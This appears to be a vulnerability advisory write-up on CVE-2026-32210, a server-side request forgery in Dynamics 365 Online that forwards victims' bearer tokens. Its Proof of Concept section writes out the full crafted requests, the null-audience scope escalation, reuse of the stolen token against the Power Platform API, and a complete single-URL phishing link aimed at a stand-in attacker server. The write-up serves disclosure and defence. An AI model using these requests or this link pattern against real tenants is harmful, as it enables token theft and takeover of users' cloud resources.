Introduction
A single crafted URL targeting a Microsoft Dynamics 365 Online tenant could silently forward a victim's Power Platform bearer token to an attacker controlled server, granting broad access to create, delete, and enumerate PowerApps, invoke Copilot Studio copilots, and execute AI workflows. Tracked as CVE-2026-32210 with a Critical CVSS score of 9.3, this Server-Side Request Forgery in the msdyn_UCIClientAuth OData endpoint was disclosed and simultaneously confirmed as remediated by Microsoft on April 23, 2026, as part of their cloud vulnerability transparency initiative.
Technical Information
Root Cause
The vulnerability is classified under CWE-918 (Server-Side Request Forgery). The root cause lies in the msdyn_UCIClientAuth OData function exposed by Microsoft Dynamics 365 Online. This function accepts several parameters including EndpointEnum, RequestMethod, RequestBody, RequestHeaders, and TokenAudience. The critical flaw is that the EndpointEnum parameter accepted arbitrary, attacker controlled URLs without adequate validation. When called, the Dynamics 365 backend would issue an outbound HTTP GET request to whatever URL was supplied in EndpointEnum, and critically, it would forward the authenticated user's JWT bearer token in the Authorization header of that outbound request.
CVSS Vector Breakdown
The CVSS 3.1 vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N, which tells us:
- Attack Vector (Network): Exploitable remotely over the internet.
- Attack Complexity (Low): No special conditions or race conditions needed.
- Privileges Required (None): The attacker does not need to be authenticated to Dynamics 365; they only need the victim to be.
- User Interaction (Required): The victim must click a crafted link while holding an active Dynamics 365 session.
- Scope (Changed): The impact extends beyond Dynamics 365 itself into the broader Power Platform.
- Confidentiality and Integrity (High): The stolen token grants read and write access across Power Platform resources.
- Availability (None): No denial of service component.
Attack Flow
The exploit proceeds in distinct stages, all originating from a single HTTP GET request:
Stage 1: SSRF with Token Forwarding. The attacker crafts a URL that calls the msdyn_UCIClientAuth function with EndpointEnum set to an attacker controlled server. When a victim with an active Dynamics 365 session navigates to this URL (via phishing email, Teams message, or any link delivery mechanism), the Dynamics 365 backend issues an outbound GET to the attacker's server. The outbound request originates from a Microsoft owned IP address and includes the victim's JWT in the Authorization: Bearer header. In this initial configuration, the token audience is scoped to the Copilot eligibility service (https://chatuxmanager.svc.cloud.microsoft).
Stage 2: Null Audience Token Bypass. By setting @TokenAudience=null instead of a specific service URL, the attacker triggers the backend to issue a far more broadly scoped token. This second token has audience https://api.powerplatform.com and is issued under app ID 00000007-0000-0000-c000-000000000000 (Microsoft Dynamics CRM). The token carries extensive Power Platform scopes including PowerApps.Apps.Create, PowerApps.Apps.Delete, PowerApps.Apps.Play, CopilotStudio.Copilots.Invoke, AiFlows.Workflows.Execute, and others.
Stage 3: Token Use Against Power Platform. The attacker presents the stolen Power Platform token directly to the tenant's Power Platform API to perform actions such as enumerating all PowerApps in the tenant, creating or deleting apps, or invoking Copilot Studio copilots.
Single URL Weaponization. Because the entire exploit uses a plain HTTP GET with all attacker controlled values embedded in the query string, the full attack collapses to a single crafted link. Delivery is trivial: email, Teams, or any context where a user might click a URL while authenticated to Dynamics 365.
Proof of Concept
A full, reproducible Proof of Concept was published on April 23, 2026 by Assumed Breach Research. The following stages demonstrate the exploit chain. A prerequisite is that the victim holds an authenticated Dynamics 365 session.
Stage 1: SSRF with Token Forwarding
GET /api/data/v9.0/msdyn_UCIClientAuth( EndpointEnum=@EndpointEnum, RequestMethod=@RequestMethod, RequestBody=@RequestBody, RequestHeaders=@RequestHeaders, TokenAudience=@TokenAudience )?@EndpointEnum='https://[attacker-controlled-server]' &@RequestMethod='GET' &@RequestBody=null &@RequestHeaders=null &@TokenAudience='https://chatuxmanager.svc.cloud.microsoft' Host: [tenant].crm[N].dynamics.com // Result: outbound request received at attacker server from Microsoft IP // Authorization: Bearer [JWT — aud: copilot eligibility service]
Stage 2: Null Audience Token Bypass
GET /api/data/v9.0/msdyn_UCIClientAuth( EndpointEnum=@EndpointEnum, RequestMethod=@RequestMethod, RequestBody=@RequestBody, RequestHeaders=@RequestHeaders, TokenAudience=@TokenAudience )?@EndpointEnum='https://[attacker-controlled-server]' &@RequestMethod='GET' &@RequestBody=null &@RequestHeaders=null &@TokenAudience=null // Result: second outbound request received at attacker server // Authorization: Bearer [JWT — aud: https://api.powerplatform.com] // scp: PowerApps.Apps.Read PowerApps.Apps.Create PowerApps.Apps.Delete // AiFlows.Workflows.Execute CopilotStudio.Copilots.Invoke ...
Stage 3: Token Use Against Power Platform
GET /powerapps/apps?api-version=1 HTTP/2 Host: [tenant-id].tenant.api.powerplatform.com Authorization: Bearer [token from stage 2] HTTP/2 200 OK Content-Type: application/json // Full PowerApps enumeration returned for the tenant
Single URL Weaponization:
https://[target-tenant].crm[N].dynamics.com/api/data/v9.0/msdyn_UCIClientAuth(
EndpointEnum=@EndpointEnum,
RequestMethod=@RequestMethod,
RequestBody=@RequestBody,
RequestHeaders=@RequestHeaders,
TokenAudience=@TokenAudience
)?@EndpointEnum='https://[attacker-controlled-server]'
&@RequestMethod='GET'
&@RequestBody=null
&@RequestHeaders=null
&@TokenAudience=null
If a victim with an active Dynamics 365 session follows this link, their Power Platform scoped bearer token is forwarded to the attacker's server. The vulnerability has been fully remediated server-side by Microsoft.
Patch Information
Microsoft has fully remediated CVE-2026-32210 through a server-side fix deployed directly to the Dynamics 365 Online cloud infrastructure. The MSRC advisory, released on April 23, 2026, explicitly states: "This vulnerability has already been fully mitigated by Microsoft. There is no action for users of this service to take."
Because Dynamics 365 Online is a SaaS product, the patch was applied at the service level across all affected tenants. There is no downloadable security update, KB article, or specific build number associated with this fix. The Security Updates table on the MSRC page lists dashes for the Article, Download, and Build Number columns, confirming the remediation was entirely infrastructure-side.
The CVSS temporal metrics set the Remediation Level to "Official Fix," and the CVE.org record tags the MSRC advisory reference as both vendor-advisory and patch. While Microsoft has not disclosed the specific code changes, the fix likely involved tightening input validation on the EndpointEnum parameter and restricting the scope of server-side requests that the msdyn_UCIClientAuth function will process.
This disclosure aligns with Microsoft's "Toward greater transparency: Unveiling Cloud Service CVEs" program, where vulnerabilities in cloud services are published even when the fix has already been silently deployed. No customer deployment steps are needed. The patch is fully in effect for all Dynamics 365 Online users as of the disclosure date.
Affected Systems and Versions
The vulnerability affects Microsoft Dynamics 365 (Online), the cloud hosted SaaS deployment of the Dynamics 365 platform. Specifically, the vulnerable component is the msdyn_UCIClientAuth OData endpoint. On-premises deployments of Dynamics 365 are not referenced in the advisory.
No specific version numbers or build ranges are provided by Microsoft, which is consistent with cloud service vulnerabilities where the vendor manages all versioning internally. All Dynamics 365 Online tenants were potentially affected prior to the server-side remediation.
